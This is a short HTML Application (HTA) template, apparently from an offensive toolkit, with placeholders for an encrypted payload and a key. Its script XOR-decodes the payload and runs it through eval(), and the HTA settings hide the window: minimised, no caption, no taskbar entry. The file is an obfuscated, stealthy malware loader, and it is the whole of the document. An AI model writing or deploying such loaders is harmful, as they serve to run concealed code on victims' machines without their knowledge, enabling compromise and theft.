<html><script>

var data = "{{ data }}"
var x = "{{ key }}"
function dk(data, x) {
	var d = ""
	data = data.split("e")
	for(var i = 0; i < data.length; i++) {
		d += String.fromCharCode((data[i]) ^ x.charCodeAt(i%x.length))
	}
	return d
}
eval(dk(data, x))

</script>
<hta:application caption="no" windowState="minimize" showInTaskBar="no" scroll="no" navigable="no" />
<body></body></html>
